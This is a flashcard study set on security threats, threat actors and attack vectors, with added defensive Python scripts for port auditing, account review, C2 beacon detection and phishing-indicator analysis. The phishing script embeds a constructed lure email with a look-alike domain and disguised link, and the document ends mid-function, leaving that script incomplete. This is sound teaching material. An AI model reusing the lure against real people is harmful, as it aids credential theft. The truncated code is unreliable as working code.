Class 2: Threat Types, Threat Actors, and Attack Vectors

Last updated 3:26 AM on 6/11/26
71 Terms

1
New cards

Vulnerability versus threat versus risk

A vulnerability is a weakness, a threat is something capable of exploiting that weakness, and risk combines the likelihood that the threat exploits the vulnerability with the impact if it does.

Example: A weak password is a vulnerability, a credential thief is a threat, and possible account compromise is the risk.

Memory trick: Weakness + danger = possible damage.

Trick question tip: Weakness or flaw means vulnerability; danger or attacker means threat; likelihood plus impact means risk.

2

Likelihood versus impact

Likelihood measures how probable a security event is, while impact measures how severe the consequences would be.

Example: An exposed system may have high likelihood of attack, while a system holding sensitive records may have high impact if compromised.

Memory trick: Likelihood = chance; impact = damage.

Trick question tip: Questions asking how probable point to likelihood; questions asking how harmful point to impact.

3

Risk assessment

A risk assessment identifies and evaluates risks so an organization can prioritize the issues that require attention first.

Example: A public-facing outdated server holding sensitive data is prioritized over an isolated low-value device.

Memory trick: Assess risk to fix the biggest danger first.

Trick question tip: If the scenario compares likelihood and impact to determine priority, think risk assessment.

4

Technical, physical, and human vulnerabilities

Technical vulnerabilities involve hardware, software, or configurations; physical vulnerabilities involve facilities or direct access; human vulnerabilities involve behavior, mistakes, or lack of awareness.

Example: A software flaw is technical, an unlocked equipment room is physical, and trusting a deceptive request is human.

Memory trick: Tech, place, people.

Trick question tip: Identify where the weakness exists: technology, physical environment, or human behavior.

5

Zero-day vulnerability

A zero-day vulnerability is a previously unknown weakness for which defenders have had little or no time to prepare and a vendor patch may not yet exist.

Example: Attackers exploit a newly discovered software flaw before an update is available.

Memory trick: Zero-day = zero days to prepare.

Trick question tip: Unknown flaw, no patch, or exploitation before vendor awareness points to zero-day.

6

Vulnerability management

Vulnerability management is the continuous process of identifying, analyzing, prioritizing, remediating, validating, and reporting weaknesses.

Example: A team scans systems, ranks findings by risk, applies updates, and confirms the weaknesses are fixed.

Memory trick: Find, rank, fix, verify, report.

Trick question tip: A repeating program for discovering and correcting weaknesses is vulnerability management, not a one-time scan.

7

Agent-based versus agentless vulnerability scanning

Agent-based scanning uses software installed on endpoints for detailed, continuous visibility, while agentless scanning examines systems remotely over the network, with supplied credentials for authenticated checks or without them for an outside-in view, and installs nothing on the target.

Example: A managed laptop reports findings through an installed agent, while a network appliance is checked remotely.

Memory trick: Agent lives on it; agentless looks from outside.

Trick question tip: Installed local scanner points to agent-based; remote scan with nothing installed points to agentless.

8

Unsupported and legacy systems

Unsupported or end-of-life systems no longer receive normal vendor security updates, making newly discovered weaknesses difficult to correct.

Example: A critical legacy device cannot be upgraded, so it is isolated and given restricted access until replacement.

Memory trick: No support means no normal fixes.

Trick question tip: If patching is impossible, look for compensating controls such as isolation, segmentation, restricted access, or replacement.

9

Attack surface

An attack surface is the total collection of possible points where a threat actor could interact with or attack an environment.

Example: Accounts, applications, open ports, wireless connections, cloud services, devices, and internet-facing systems all add to the attack surface.

Memory trick: More doors and windows means more ways in.

Trick question tip: If the question asks about all possible entry points together, think attack surface.

10

Attack vector

An attack vector is the specific path or method a threat actor uses to reach a target or deliver an attack.

Example: A deceptive message, vulnerable service, removable device, voice call, or compromised supplier can be an attack vector.

Memory trick: Surface = all doors; vector = the door used.

Trick question tip: If the question asks how the attacker entered or delivered the attack, think attack vector.

11

Attack surface reduction

Attack surface reduction removes or restricts unnecessary exposure so attackers have fewer opportunities to find a weakness.

Example: An organization closes unused ports, disables unnecessary services, removes stale accounts, limits public access, and segments networks.

Memory trick: Fewer entry points, fewer chances to attack.

Trick question tip: Closing ports, disabling services, removing accounts, least privilege, and segmentation point to attack surface reduction.

12

Remote exploit versus local exploit

A remote exploit can trigger a vulnerability across a network without prior local access, while a local exploit requires an attacker to already have access or credentials on the system.

Example: An attacker exploits an exposed service remotely; after stealing a user account, the attacker uses a local flaw to gain administrator privileges.

Memory trick: Remote reaches in; local starts inside.

Trick question tip: No prior login points to remote exploitation; authenticated access followed by privilege escalation points to local exploitation.

13

Direct access vector

A direct access vector requires physical access to a device or location and can bypass many network protections.

Example: An intruder uses an unattended workstation or connects unauthorized removable media to a system.

Memory trick: Physical reach can bypass digital walls.

Trick question tip: Unlocked workstation, physical port, removable media, or boot device points to direct access.

14

Wired network vector

A wired network vector uses a physical network connection to gain access, monitor traffic, or attack internal systems.

Example: An unauthorized person connects a device to an exposed network port inside a building.

Memory trick: Plug into the wire, enter the network.

Trick question tip: Physical Ethernet connection or exposed switch port points to a wired network vector.

15

Wireless and remote access vectors

Wireless and remote access vectors target Wi-Fi, remote-access services, or other connections that extend the network beyond a controlled physical location.

Example: An attacker creates a deceptive wireless access point or steals credentials for a remote connection.

Memory trick: No cable does not mean no risk.

Trick question tip: Fake access points, stolen remote credentials, wireless connections, or remote services point to wireless or remote access vectors.

16

Cloud access vector

A cloud access vector targets internet-accessible cloud resources through weak credentials, exposed interfaces, or misconfiguration.

Example: An attacker signs in with a stolen cloud account or finds a storage service with overly broad permissions.

Memory trick: Cloud entry often begins with identity or configuration.

Trick question tip: Weak cloud credentials, public storage, exposed cloud interfaces, or misconfiguration point to a cloud vector.

17

Default credentials

Default credentials are manufacturer-set usernames and passwords that should be changed before a device or service is used.

Example: A connected device remains protected by its factory administrator password, which is widely known.

Memory trick: Default password = attacker already knows the first guess.

Trick question tip: Factory username, unchanged password, or vendor default login points to default credentials.

18

Open service ports

Open ports expose network services, and unnecessary or vulnerable services increase the attack surface.

Example: A server exposes a remote management service that the organization does not use.

Memory trick: Every open port is another possible door.

Trick question tip: The best mitigation is to close unused ports, disable unnecessary services, and restrict required ports.
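Added example, not part of the original set, covering the attack surface, attack surface reduction and open service ports cards together: the script parses constructed `ss -tlnp` output, separates loopback-only listeners (not reachable from the network) from externally reachable ones, and reports the exposed services that are not on an approval list as candidates to close or restrict. The process names, ports and the approval list are assumptions for the example.

```python
import re

# Constructed output in the layout of `ss -tlnp` (Linux); processes, pids and
# ports are made up for the example and are not from the original page.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:443         0.0.0.0:*     users:(("nginx",pid=1042,fd=6))
LISTEN 0      128    127.0.0.1:5432      0.0.0.0:*     users:(("postgres",pid=930,fd=5))
LISTEN 0      128    0.0.0.0:5900        0.0.0.0:*     users:(("x11vnc",pid=2210,fd=4))
LISTEN 0      128    [::]:8080           [::]:*        users:(("java",pid=2401,fd=12))
LISTEN 0      128    0.0.0.0:3306        0.0.0.0:*     users:(("mysqld",pid=1515,fd=20))
"""

# Approved externally reachable services as (port, process name). Assumption
# for the example: only SSH and the web front end are meant to be reachable.
APPROVED_EXTERNAL = {(22, "sshd"), (443, "nginx")}

# A bind to one of these is reachable only from the host itself.
LOOPBACK_PREFIXES = ("127.", "[::1]")

_LINE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)"'
)


def parse_listeners(ss_output: str) -> list:
    """Return (address, port, process) tuples for every LISTEN line."""
    listeners = []
    for line in ss_output.splitlines():
        m = _LINE.match(line)
        if m:
            listeners.append((m["addr"], int(m["port"]), m["proc"]))
    return listeners


def audit_attack_surface(ss_output: str) -> dict:
    """Split listeners into approved, unexpected-exposed and loopback-only.

    A service bound only to loopback does not add to the external attack
    surface; anything bound to a wildcard or a routable address does, and if
    it is not on the approval list it is a door nobody decided to open.
    """
    report = {"approved": [], "unexpected_exposed": [], "loopback_only": []}
    for addr, port, proc in parse_listeners(ss_output):
        if addr.startswith(LOOPBACK_PREFIXES):
            report["loopback_only"].append((port, proc))
        elif (port, proc) in APPROVED_EXTERNAL:
            report["approved"].append((port, proc))
        else:
            report["unexpected_exposed"].append((port, proc))
    for key in report:
        report[key].sort()
    return report


if __name__ == "__main__":
    result = audit_attack_surface(SAMPLE_SS_OUTPUT)
    for port, proc in result["unexpected_exposed"]:
        print(f"close or restrict: {proc} on port {port}")
```

On a real host, feed the script the live `ss -tlnp` output and keep the approval list under version control; each entry it flags is either a service to disable, a bind address to move to loopback, or a port to restrict with a host firewall rule.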

19

Lure-based attack vector

A lure-based vector uses something attractive, useful, urgent, or interesting to persuade a victim to open a file, connect a device, or run software.

Example: A malicious program is disguised as a free application or important update.

Memory trick: The lure attracts; the hidden code hooks.

Trick question tip: Free software, prizes, urgent updates, or curiosity used to make the user act point to a lure-based vector.

20

Removable media and USB drop attack

A removable-media attack uses a device such as a USB drive to deliver malware or gain access; a drop attack leaves infected media where a curious person may connect it.

Example: An infected drive is left in a break room hoping an employee plugs it into a company computer.

Memory trick: Found USB = do not plug it in.

Trick question tip: Abandoned removable media relying on curiosity points to a USB drop or baiting attack.

21

File-based attack vector

A file-based vector delivers malicious code through an executable, document, image, archive, or other file that a vulnerable application or user opens.

Example: A document presented as an invoice runs harmful code when opened.

Memory trick: The file looks normal; the payload is not.

Trick question tip: Attachments, documents, images, or downloads used to execute malicious code point to a file-based vector.

22

Message-based attack vector

A message-based vector uses email, text messages, instant messaging, social platforms, or collaboration tools to deliver links, files, requests, or deception.

Example: A message pretending to be an account alert pressures a user to open a link.

Memory trick: The message delivers the trap.

Trick question tip: Email, SMS, chat, social media, or collaboration messages used as delivery mechanisms point to message-based vectors.

23

Zero-click exploit

A zero-click exploit compromises a target without requiring the user to open a link, launch a file, or knowingly interact with the content.

Example: A vulnerable messaging application processes a received image automatically and triggers the flaw.

Memory trick: Zero-click = no tap needed.

Trick question tip: If merely receiving or previewing content causes the compromise, with no tap or click by the user, that points to a zero-click exploit.

24

Threat actor

A threat actor is a person, group, organization, or entity capable of causing a security incident.

Example: Threat actors include unskilled attackers, insiders, hacktivists, organized crime, competitors, and nation-state groups.

Memory trick: Threat actor = the who behind the threat.

Trick question tip: If the question asks who is causing or carrying out the activity, identify the threat actor.

25

Threat actor attributes

Threat actors are compared by whether they are internal or external, their sophistication, resources, funding, access, intent, and motivation.

Example: A well-funded external group using custom tools differs from a careless employee who already has authorized access.

Memory trick: Who, where, skill, money, and why.

Trick question tip: Scenario clues about access, capability, funding, or goals are threat actor attributes.

26

External versus internal threat actor

An external actor begins without authorized access and must gain entry, while an internal actor already has legitimate or trusted access.

Example: A remote criminal must bypass controls, while an employee can misuse an existing account.

Memory trick: External breaks in; internal starts in.

Trick question tip: Employees, contractors, partners, or valid credentials point to internal risk; outsiders bypassing controls point to external actors.

27

Authorized versus unauthorized hacker

An authorized hacker has permission to test systems and report weaknesses, while an unauthorized hacker accesses or tests systems without permission.

Example: A penetration tester works under written authorization; a malicious intruder does not.

Memory trick: Permission separates ethical testing from illegal intrusion.

Trick question tip: Even harmless intent does not make testing authorized; look for explicit permission and scope.

28

Unskilled attacker

An unskilled attacker, historically called a script kiddie, relies on prebuilt tools, public scripts, or automated services and may not understand the underlying attack.

Example: A person downloads an existing tool and launches it against random systems.

Memory trick: Uses the tool but did not build the tool.

Trick question tip: Public tools, minimal expertise, or prebuilt scripts point to an unskilled attacker.

29

Hacktivist

A hacktivist uses cyber activity to promote a political, social, or ideological cause and often seeks publicity, disruption, or disclosure.

Example: A group disrupts an organization to protest its policies.

Memory trick: Hacktivist = hacking for a cause.

Trick question tip: Ideology, protest, publicity, or political messaging points to hacktivism rather than ordinary financial crime.

30

Nation-state threat actor

A nation-state actor operates for or receives support from a government and typically has extensive funding, intelligence, expertise, and long-term strategic goals.

Example: A government-backed group conducts espionage against critical infrastructure or defense organizations.

Memory trick: Nation-state = government resources and strategic goals.

Trick question tip: Espionage, military advantage, sabotage, critical infrastructure, and exceptional resources point to nation-state activity.

31

Organized crime

Organized cybercrime consists of coordinated groups that operate like businesses and primarily seek financial profit through fraud, theft, extortion, or criminal services.

Example: A group uses specialized developers, negotiators, and money handlers to run ransomware operations.

Memory trick: Organized crime = cybercrime as a business.

Trick question tip: Financial gain, specialized criminal teams, ransomware, fraud, or crime-as-a-service point to organized crime.

32

Competitor threat actor

A competitor threat actor targets a rival organization to gain business advantage through commercial espionage, theft of intellectual property, disruption, or reputational harm.

Example: A rival seeks confidential research, designs, formulas, customer lists, or strategic plans.

Memory trick: Competitor wants your business advantage.

Trick question tip: Trade secrets, corporate espionage, rival company, or stolen research points to a competitor threat.

33

Insider threat

An insider threat comes from someone with authorized access, such as an employee, contractor, vendor, partner, temporary worker, or former employee whose access was not removed.

Example: A former employee retains active credentials after leaving the organization.

Memory trick: Trusted access can still create risk.

Trick question tip: The defining clue is existing authorized knowledge or access, not whether the person is an employee.
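Added example (not from the original cards) for the insider-threat case of access that was never removed, which is also the "remove stale accounts" step of attack surface reduction: reconcile a directory export against the HR roster and flag enabled accounts that are orphaned (owner no longer active), unowned (nobody accountable) or stale (unused past a threshold). The export, roster, threshold and reference date are constructed for the example.

```python
import csv
import io
from datetime import date, timedelta

# Constructed directory export and HR roster for this example; the names and
# the reference date are made up and not from the original page.
ACCOUNT_EXPORT = """\
username,owner_email,enabled,last_logon
jsmith,j.smith@example.test,true,2024-05-30
mlee,m.lee@example.test,true,2024-01-10
rdiaz,r.diaz@vendor.test,true,2024-05-28
svc-backup,,true,2024-05-31
pwong,p.wong@example.test,false,2023-11-02
"""

# People HR currently lists as active (employees and contractors alike).
ACTIVE_ROSTER = {"j.smith@example.test", "m.lee@example.test", "p.wong@example.test"}

# "Today" for the review run, fixed so the example is reproducible.
REFERENCE_DATE = date(2024, 6, 1)
STALE_AFTER = timedelta(days=90)


def review_accounts(export_csv: str, roster: set, today: date) -> dict:
    """Flag enabled accounts an insider-threat or attack-surface review
    should look at.

    orphaned - enabled, but the owner is no longer on the active roster
               (the 'former employee still has credentials' case)
    unowned  - enabled with no recorded owner, so nobody is accountable
    stale    - enabled but not used within STALE_AFTER; candidate for removal
    Disabled accounts are skipped: they are not usable access.
    """
    findings = {"orphaned": [], "unowned": [], "stale": []}
    for row in csv.DictReader(io.StringIO(export_csv)):
        if row["enabled"].strip().lower() != "true":
            continue
        owner = row["owner_email"].strip().lower()
        last = date.fromisoformat(row["last_logon"]) if row["last_logon"] else None
        if not owner:
            findings["unowned"].append(row["username"])
        elif owner not in roster:
            findings["orphaned"].append(row["username"])
        # never-logged-on counts as stale too
        if last is None or today - last > STALE_AFTER:
            findings["stale"].append(row["username"])
    return findings


if __name__ == "__main__":
    report = review_accounts(ACCOUNT_EXPORT, ACTIVE_ROSTER, REFERENCE_DATE)
    for category, names in report.items():
        print(f"{category}: {', '.join(names) or '-'}")
```

The orphaned check is the one that catches the card's example: the contractor's account is still enabled although HR no longer lists the person, so it is live access with no one responsible for it. Running this against a real export, the roster should come from the HR system, not from the directory itself, otherwise the review only confirms the directory agrees with itself.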

34

Malicious versus unintentional insider

A malicious insider intentionally abuses access for revenge, financial gain, or another objective, while an unintentional insider causes harm through mistakes, negligence, or poor training.

Example: One employee deliberately steals records; another accidentally shares them with the wrong recipient.

Memory trick: Malice means on purpose; negligence means by mistake.

Trick question tip: Disgruntled, deliberate, or revenge points to malicious; accidental, careless, or poorly trained points to unintentional.

35

Insider collusion

Collusion occurs when an insider intentionally cooperates with an external actor to bypass controls or provide access, credentials, or information.

Example: An employee gives a criminal valid credentials in exchange for payment.

Memory trick: Outside attacker plus inside helper = collusion.

Trick question tip: If internal and external actors work together, choose collusion.

36

Shadow IT

Shadow IT is the use of unauthorized devices, applications, or cloud services outside official approval, management, and security monitoring.

Example: An employee stores company documents in a personal hosted storage service without approval.

Memory trick: Shadow IT operates outside IT's light.

Trick question tip: Unapproved apps, personal storage, unmanaged devices, or services outside monitoring point to shadow IT.

37

Advanced persistent threat

An APT is a highly capable, organized threat group that uses advanced methods and maintains long-term, stealthy access to achieve strategic objectives.

Example: The group remains in an environment for months, moves laterally, gathers intelligence, and preserves access.

Memory trick: Advanced tools, persistent access, organized threat.

Trick question tip: Long-term stealth, persistence, lateral movement, strategic access, or nation-state association points to an APT.

38

Structured versus opportunistic attack

A structured attack is carefully planned against a selected target, while an opportunistic attack broadly searches for anyone vulnerable enough to compromise.

Example: A targeted espionage campaign is structured; a mass message sent to thousands of random users is opportunistic.

Memory trick: Structured selects; opportunistic scans.

Trick question tip: Specific target and research point to structured; mass scanning or random victims point to opportunistic.

39

Threat actor motivation

Motivation is the reason a threat actor carries out an attack, such as financial gain, espionage, ideology, revenge, disruption, curiosity, or recognition.

Example: A criminal seeks payment, while a government-backed group seeks intelligence.

Memory trick: Motivation = why they attack.

Trick question tip: Do not confuse capability with motivation: capability is what they can do; motivation is why they do it.

40

Financial motivation

Financially motivated actors seek profit through theft, fraud, extortion, ransomware, stolen data, or cryptocurrency.

Example: A criminal encrypts business data and demands payment.

Memory trick: Follow the money.

Trick question tip: Profit, payment, fraud, extortion, theft, or resale of data points to financial motivation.

41

Espionage motivation

Espionage seeks confidential information for political, military, intelligence, or commercial advantage.

Example: A group steals research data and strategic plans without immediately disrupting the target.

Memory trick: Espionage = steal secrets for advantage.

Trick question tip: Quiet theft of intelligence, research, trade secrets, or government information points to espionage.

42

Ideological and political motivation

Ideological or political actors attack to promote beliefs, protest decisions, influence opinion, or advance a political objective.

Example: A group defaces or disrupts a service to draw attention to a cause.

Memory trick: Belief and politics drive the attack.

Trick question tip: Protest, activism, propaganda, publicity, or ideology points to political or ideological motivation.

43

Revenge, chaos, and recognition

Some actors seek retaliation, disruption, attention, curiosity, or proof of skill rather than money or intelligence.

Example: A disgruntled worker damages systems after termination, or an attacker defaces a service for recognition.

Memory trick: Not every attacker follows the money.

Trick question tip: Disgruntled behavior points to revenge; random destruction points to chaos; proving skill or seeking attention points to recognition.

44

Service disruption, data exfiltration, and disinformation

Service disruption targets availability, data exfiltration steals information and targets confidentiality, and disinformation spreads false or manipulated information and targets integrity.

Example: An outage blocks a service, stolen records expose secrets, and false reports undermine trust in information.

Memory trick: Disrupt availability; exfiltrate confidentiality; disinform integrity.

Trick question tip: Map the goal to the CIA triad: unavailable service, stolen data, or untrustworthy information.

45

Malware

Malware is software or code designed to damage systems, steal data, disrupt operations, spy on users, or provide unauthorized access.

Example: Malware families include viruses, worms, Trojans, ransomware, spyware, rootkits, and bots.

Memory trick: Malware = malicious software.

Trick question tip: If harmful code is the main mechanism, classify the specific malware type when possible.

46

Virus versus worm

A virus attaches to a host file or program and normally spreads when that host runs, while a worm self-replicates across systems or networks without attaching to a host file.

Example: A user opens an infected document to activate a virus; a worm automatically spreads to vulnerable devices.

Memory trick: Virus needs a host; worm crawls by itself.

Trick question tip: Host file or user execution points to virus; self-replication and automatic network spread point to worm.

47

Trojan

A Trojan is malware disguised as legitimate or desirable software and relies on the victim to install or run it.

Example: A supposed free application installs a hidden backdoor.

Memory trick: Trojan looks useful but hides danger.

Trick question tip: Legitimate appearance plus hidden malicious behavior points to a Trojan.

48

Ransomware

Ransomware blocks access to systems or encrypts data and demands payment, often combining disruption with data theft and extortion.

Example: A business loses access to files and receives a payment demand.

Memory trick: Ransomware holds access for ransom.

Trick question tip: Encryption plus payment demand points to ransomware; stolen data may be used for double extortion.

49

Spyware and keylogger

Spyware secretly monitors activity or collects information, while a keylogger specifically records keyboard input.

Example: Malware captures browsing activity, credentials, and typed messages without the user's knowledge.

Memory trick: Spyware watches; keylogger records keys.

Trick question tip: General secret monitoring points to spyware; captured keystrokes point to a keylogger.

50

Rootkit and backdoor

A rootkit hides malicious activity and maintains privileged access, while a backdoor provides a hidden method of bypassing normal authentication or security controls.

Example: Malware conceals itself at a privileged level and creates a secret access path for later use.

Memory trick: Rootkit hides; backdoor lets attackers return.

Trick question tip: Stealth and concealment point to rootkit; secret reentry or bypassing normal login points to backdoor.

51

Botnet and command and control

A botnet is a group of compromised devices controlled together, and command-and-control infrastructure sends instructions to those devices and receives results.

Example: Thousands of infected devices receive commands to generate disruptive traffic.

Memory trick: Bots are the army; C2 gives the orders.

Trick question tip: Many compromised devices acting together point to botnet; the controller or instruction channel is C2.
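Added example, not from the original page, of one way a defender spots the command-and-control channel described here: a bot checks in on a fixed timer, so the gaps between its connections are far more regular than human browsing or an ordinary update client. The script groups constructed egress-log lines by source and destination and flags flows whose inter-connection gaps have a low coefficient of variation. The log format, thresholds and addresses are assumptions for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed egress-proxy log lines for this example (timestamp, source host,
# destination host:port, bytes sent); the addresses are documentation ranges
# and are not from the original page.
SAMPLE_LOG = """\
2024-06-01T09:00:00 10.0.0.5 203.0.113.7:443 512
2024-06-01T09:00:00 10.0.0.8 updates.example.test:443 40120
2024-06-01T09:00:07 10.0.0.8 updates.example.test:443 1980
2024-06-01T09:01:01 10.0.0.5 203.0.113.7:443 498
2024-06-01T09:02:00 10.0.0.5 203.0.113.7:443 510
2024-06-01T09:03:02 10.0.0.5 203.0.113.7:443 505
2024-06-01T09:03:40 10.0.0.8 updates.example.test:443 77
2024-06-01T09:04:00 10.0.0.5 203.0.113.7:443 512
2024-06-01T09:04:02 10.0.0.8 updates.example.test:443 63410
2024-06-01T09:05:01 10.0.0.5 203.0.113.7:443 507
2024-06-01T09:06:00 10.0.0.5 203.0.113.7:443 512
2024-06-01T09:07:01 10.0.0.5 203.0.113.7:443 501
2024-06-01T09:11:15 10.0.0.8 updates.example.test:443 220
2024-06-01T09:12:00 10.0.0.9 203.0.113.7:443 600
"""


def parse_log(text: str) -> dict:
    """Group connection timestamps by (source, destination)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, _bytes = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def find_beacons(text: str, min_connections: int = 6, max_cv: float = 0.15) -> list:
    """Return flows whose inter-connection gaps are suspiciously regular.

    Malware polling its C2 connects on a fixed timer plus a little jitter, so
    the gaps cluster tightly: a low coefficient of variation (stdev / mean).
    Each hit carries the evidence a responder needs: count, mean interval and
    the spread. Thresholds are assumptions for the example; tune them per
    environment.
    """
    beacons = []
    for (src, dst), times in parse_log(text).items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            beacons.append({"src": src, "dst": dst, "count": len(times),
                            "mean_interval": round(mean, 1), "cv": round(cv, 3)})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG):
        print(f'{b["src"]} -> {b["dst"]}: {b["count"]} connections, '
              f'every ~{b["mean_interval"]}s (cv={b["cv"]})')
```

In the sample, the host checking in every minute with a second or two of jitter is reported; the update client with bursts and long pauses is not. Real beacons add jitter deliberately, so the threshold is a trade-off, and the count and interval in each hit are what lets an analyst decide whether to look at the endpoint.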

52

Polymorphic malware

Polymorphic malware changes parts of its code or appearance to avoid matching known signatures while retaining its malicious purpose.

Example: Each copy looks different to a signature scanner even though the behavior remains harmful.

Memory trick: Same threat, changing disguise.

Trick question tip: Changing code to evade signature-based detection points to polymorphic malware.

53

Social engineering

Social engineering manipulates people into revealing information, granting access, or performing actions that benefit an attacker.

Example: An attacker exploits trust, urgency, fear, authority, curiosity, or helpfulness to obtain credentials.

Memory trick: Social engineering = hack the human.

Trick question tip: If the attacker persuades a person instead of directly defeating technology, think social engineering.

54

Impersonation versus pretexting

Impersonation means pretending to be a trusted person or organization, while pretexting adds a detailed fabricated story that explains and supports the request.

Example: An attacker claims to be support staff; a pretext includes the employee's department, manager, and a believable service issue.

Memory trick: Impersonation is the role; pretexting is the story.

Trick question tip: Pretending alone points to impersonation; a researched backstory and scenario point to pretexting.

55

Phishing

Phishing uses deceptive messages or sites that appear trustworthy to steal information, install malware, or obtain access.

Example: A fake account notice directs a user to a fraudulent login page.

Memory trick: Phishing casts a wide deceptive net.

Trick question tip: Generic deceptive messages sent broadly point to phishing; a specifically researched target points to spear phishing.

56

Spear phishing versus whaling

Spear phishing targets a specific person or group using tailored information, while whaling is spear phishing aimed at senior executives or other high-value individuals.

Example: A customized message targets an accountant; a similar attack targeting the chief executive is whaling.

Memory trick: Spear = specific; whale = big target.

Trick question tip: Named employee or department points to spear phishing; executive or high-value leader points to whaling.

57

Vishing versus smishing

Vishing is phishing conducted through voice calls, while smishing uses SMS or text messages.

Example: A caller pretends to represent a service provider; a text claims an account needs immediate verification.

Memory trick: Vishing = voice; smishing = SMS.

Trick question tip: Phone conversation points to vishing; text message points to smishing.

58

Business email compromise

Business email compromise is a targeted fraud in which an attacker impersonates or compromises a trusted business account to request payments, data, or account changes.

Example: A message appearing to come from an executive asks finance staff to change payment details.

Memory trick: BEC uses business trust to steal.

Trick question tip: Executive impersonation, invoice changes, wire transfers, payroll changes, or a real compromised mailbox point to BEC.

59

Brand impersonation

Brand impersonation copies an organization's name, logos, formatting, and communication style to make a fraudulent message or login page appear authentic.

Example: A fake support page closely matches a familiar company's normal appearance.

Memory trick: Copy the brand to borrow its trust.

Trick question tip: Copied logos, design, tone, or near-identical communications point to brand impersonation.

60

Credential harvesting

Credential harvesting tricks users into entering usernames, passwords, or other authentication information into an attacker-controlled prompt or page.

Example: A fraudulent login form records the user's credentials and then displays a normal-looking error.

Memory trick: Fake login, real credentials stolen.

Trick question tip: A deceptive sign-in page or prompt whose purpose is collecting passwords points to credential harvesting.

61

Baiting

Baiting offers something desirable or interesting to persuade a person to perform an unsafe action.

Example: A supposedly free download or abandoned storage device causes the victim to install malware.

Memory trick: Bait hides the hook.

Trick question tip: Free item, prize, download, or curiosity used to trigger action points to baiting.

62

Tailgating versus piggybacking

Tailgating occurs when an unauthorized person follows an authorized person into a restricted area without permission, while piggybacking occurs when the authorized person knowingly allows entry.

Example: An intruder slips through a closing door unnoticed; in another case, an employee deliberately holds the door open.

Memory trick: Tailgating sneaks; piggybacking gets a ride.

Trick question tip: Unaware authorized person points to tailgating; knowingly assisting entry points to piggybacking.

63

Shoulder surfing

Shoulder surfing obtains sensitive information by watching a person enter or view it.

Example: Someone observes a password, PIN, badge code, or confidential screen in a public area.

Memory trick: Look over the shoulder, steal what is shown.

Trick question tip: Direct visual observation of credentials or screens points to shoulder surfing.

64

Dumpster diving

Dumpster diving searches discarded materials for sensitive information that was not securely destroyed.

Example: An attacker retrieves printed records, labels, or equipment details from ordinary trash.

Memory trick: Trash can still contain intelligence.

Trick question tip: Information recovered from discarded papers or devices points to dumpster diving.

65

Pharming versus typosquatting

Pharming redirects a correctly entered destination to an attacker-controlled location, typically by manipulating name resolution (a poisoned DNS cache or an altered local hosts file), while typosquatting registers a look-alike name that relies on the user mistyping or misreading the real one.

Example: A user types the correct service name but is redirected through poisoned name resolution; another user reaches a look-alike page after a typing error.

Memory trick: Pharming changes the route; typosquatting catches the typo.

Trick question tip: Correct name but wrong destination points to pharming; misspelled or look-alike name points to typosquatting.
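Added example (not part of the original cards) that serves the phishing, business email compromise, brand impersonation, credential harvesting and typosquatting cards at once: a script that pulls the indicators those cards describe out of one raw message. It checks for a brand name in the display name with an untrusted sender, a sender domain within a small edit distance of the real one, a Reply-To that diverts replies to a different domain, links whose visible URL differs from the real target, and link domains that are look-alikes. The message, trusted domains, brand words, thresholds and the two-label "registrable domain" simplification are assumptions for the example.

```python
import email
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the organisation legitimately uses and the names an attacker would
# most likely impersonate; both are assumptions for the example.
TRUSTED_DOMAINS = {"example.test"}
BRAND_WORDS = {"example corp", "example"}

# Constructed phishing message for this example; nothing here comes from the
# original page.
RAW_EMAIL = """\
From: "Example Corp Security" <alerts@examp1e.test>
Reply-To: verify@secure-mail-login.test
To: finance@example.test
Subject: Urgent: confirm your account today
Content-Type: text/html

<html><body>
<p>Your account will be locked. Sign in at
<a href="http://examp1e.test/login">https://example.test/login</a> now.</p>
<p>Need help? <a href="https://www.example.test/support">Support</a></p>
</body></html>
"""


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a small value between unequal domains suggests a look-alike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Simplification: treat the last two labels as the registrable domain."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def is_lookalike(domain: str) -> bool:
    d = registrable(domain)
    return d not in TRUSTED_DOMAINS and any(
        levenshtein(d, t) <= 2 for t in TRUSTED_DOMAINS)


class _Links(HTMLParser):
    """Collect (href, visible text) for every <a> in the body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def analyse(raw: str) -> set:
    """Return the set of phishing indicators found in one raw message."""
    msg = email.message_from_string(raw)
    display, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2].lower()
    indicators = set()

    # Brand impersonation: trusted name in the display name, untrusted sender.
    if any(w in display.lower() for w in BRAND_WORDS) \
            and registrable(from_domain) not in TRUSTED_DOMAINS:
        indicators.add("brand_in_display_name")
    if is_lookalike(from_domain):
        indicators.add("lookalike_sender_domain")

    # BEC pattern: replies silently go somewhere other than the sender.
    _, reply = parseaddr(msg.get("Reply-To", ""))
    if reply and registrable(reply.rpartition("@")[2]) != registrable(from_domain):
        indicators.add("reply_to_mismatch")

    parser = _Links()
    parser.feed(msg.get_payload())
    for href, text in parser.links:
        host = urlparse(href).hostname or ""
        if is_lookalike(host):
            indicators.add("lookalike_link_domain")
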